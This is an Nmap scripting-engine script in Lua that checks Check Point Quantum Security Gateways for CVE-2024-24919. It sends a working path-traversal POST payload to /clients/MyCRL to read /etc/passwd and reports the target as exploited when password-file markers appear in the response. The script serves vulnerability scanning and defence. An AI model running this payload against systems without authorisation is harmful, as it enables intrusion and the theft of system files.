description = [[
CVE-2024-24919 Vulnerability - Check
Este script de Nmap busca verificar la vulnerabilidad CVE-2024-24919 en la siguiente ruta
"/clients/MyCRL" mediante una solicitud POST e interpretando la
respuesta HTTP 200. Si se encuentran las palabras "admin, root o sshd"
significa que Check Point es Vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
]]

---
-- Script metadata for the Nmap Scripting Engine: the NSE reads the globals
-- `description`, `author`, `license`, `categories` and `portrule` below.
--
-- @usage
-- nmap -p443 --script cve-2024-24919.nse <target>
-- @output
-- PORT STATE SERVICE
-- 443/tcp open https
-- | CVE-2024-24919:
-- | VULNERABLE:
-- | Check Point Quantum Security Gateways Information Disclosure Vulnerability
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2024-24919
-- | Risk factor: HIGH CVSS: 8.6
-- | Check Point Quantum Security Gateways contain an unspecified information disclosure vulnerability. The vulnerability potentially allows an attacker to access information on Gateways connected to the internet, with IPSec
-- | VPN, Remote Access VPN or Mobile Access enabled. This issue affects several prod
-- | Disclosure date: 2024-05-30
-- | References:
-- | https://www.cvedetails.com/cve/CVE-2024-24919/
-- | https://support.checkpoint.com/results/sk/sk182336
-- |_ HTTP response:

author = "Edgar Salazar <edgar.salazar@guayoyo.io>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = { "vuln", "exploit" }

-- NSE libraries, alphabetically; `string` is the standard library re-bound
-- as a local so lookups inside the script stay local.
local http = require("http")
local shortport = require("shortport")
local stdnse = require("stdnse")
local string = require("string")
local vulns = require("vulns")

-- Run against any port the http portrule recognises (plain HTTP or TLS).
portrule = shortport.http
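--- Words whose presence in an HTTP 200 body is taken as evidence that the
-- traversal request was answered with a password file. They are the same
-- three the original check used and are deliberately loose (a plain "root"
-- also occurs in ordinary HTML), which is why a match only counts together
-- with the 200 status.
local BODY_MARKERS = { "admin", "root", "sshd" }

--- Return the first marker found in `body`, or nil when none matches.
-- Uses a plain (non-pattern) find so the marker text is taken literally.
-- @tparam string|nil body response body; a nil or non-string body yields nil
-- @treturn string|nil the marker that matched
local function find_marker(body)
  if type(body) ~= "string" then
    return nil
  end
  for _, marker in ipairs(BODY_MARKERS) do
    if string.find(body, marker, 1, true) then
      return marker
    end
  end
  return nil
end

--- True when the response carries the Server banner the original script
-- looked for ("Check Point SVN foundation").
-- In the NSE http library `response.header` is a table keyed by lowercase
-- header name, so it cannot be searched with string.find directly as the
-- original code did (that call raised an error instead of matching).
-- @tparam table|nil response result of http.get / http.post
-- @treturn boolean
local function has_checkpoint_banner(response)
  local server = response and response.header and response.header["server"]
  if type(server) ~= "string" then
    return false
  end
  return string.find(server, "Check Point SVN foundation", 1, true) ~= nil
end

--- Script entry point: probe `host:port` for CVE-2024-24919 and return the
-- vulns-library report.
--
-- Two probes are made. The first is the traversal POST to /clients/MyCRL;
-- an HTTP 200 whose body contains one of BODY_MARKERS sets the state to
-- EXPLOIT. Otherwise a plain GET to the same path is made and a Check Point
-- SVN foundation Server banner sets LIKELY_VULN. The banner check is
-- version-agnostic evidence only: it does not by itself show the fix is
-- absent.
--
-- @param host Nmap host table
-- @param port Nmap port table
-- @return formatted report string from vulns.Report:make_output
action = function(host, port)
  local vuln = {
    title = "Check Point Quantum Security Gateways Information Disclosure Vulnerability",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "HIGH",
    scores = {
      CVSS = "8.6",
    },
    IDS = { CVE = 'CVE-2024-24919' },
    -- NOTE(review): this text ends mid-word ("several prod"); it is emitted
    -- verbatim in the report, so the truncation shows up in scan output.
    description = [[
Check Point Quantum Security Gateways contain an unspecified information disclosure vulnerability. The vulnerability potentially allows an attacker to access information on Gateways connected to the internet,
with IPSec VPN, Remote Access VPN or Mobile Access enabled. This issue affects several prod
]],
    references = {
      'https://www.cvedetails.com/cve/CVE-2024-24919/',
      'https://support.checkpoint.com/results/sk/sk182336'
    },
    dates = {
      disclosure = { year = '2024', month = '05', day = '30' },
    },
    check_results = {
    },
    exploit_results = {
    },
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  local uri = "/clients/MyCRL"
  local PAYLOAD = "aCSHELL/../../../../../../../../../../../etc/passwd"

  -- Probe 1: traversal POST. Only an HTTP 200 whose body carries a marker
  -- counts. The original condition was written as `A and B or C or D`, which
  -- binds the status test to the first marker only, so any response that
  -- merely contained "root" or "sshd" was reported as exploited regardless
  -- of status; and a nil body (failed request) made string.find raise.
  local options = { header = {} }
  options.header["Host"] = 'action'
  options.header["Content-Type"] = 'application/x-www-form-urlencoded'
  options.header["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
  local response = http.post(host, port, uri, options, nil, PAYLOAD)

  local marker = nil
  if response and response.status == 200 then
    marker = find_marker(response.body)
  end

  if marker then
    vuln.state = vulns.STATE.EXPLOIT
    -- Record what matched rather than copying the retrieved file into the
    -- report: the marker plus status is the evidence, and the file contents
    -- would otherwise be written into every saved Nmap output.
    vuln.exploit_results = string.format(
      "HTTP 200 response to POST %s contains marker '%s' (%d bytes)",
      uri, marker, #response.body)
  else
    -- Probe 2: plain GET to the same path; the Server banner alone only
    -- justifies LIKELY_VULN, never EXPLOIT.
    options = { header = {} }
    options.header["Host"] = 'action'
    options.header["Accept"] = 'text/html,application/xhtml+xml,application/xml'
    options.header["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; Check Point)'
    response = http.get(host, port, uri, options)
    if response and response.status == 200 and has_checkpoint_banner(response) then
      vuln.state = vulns.STATE.LIKELY_VULN
    end
  end

  return report:make_output(vuln)
end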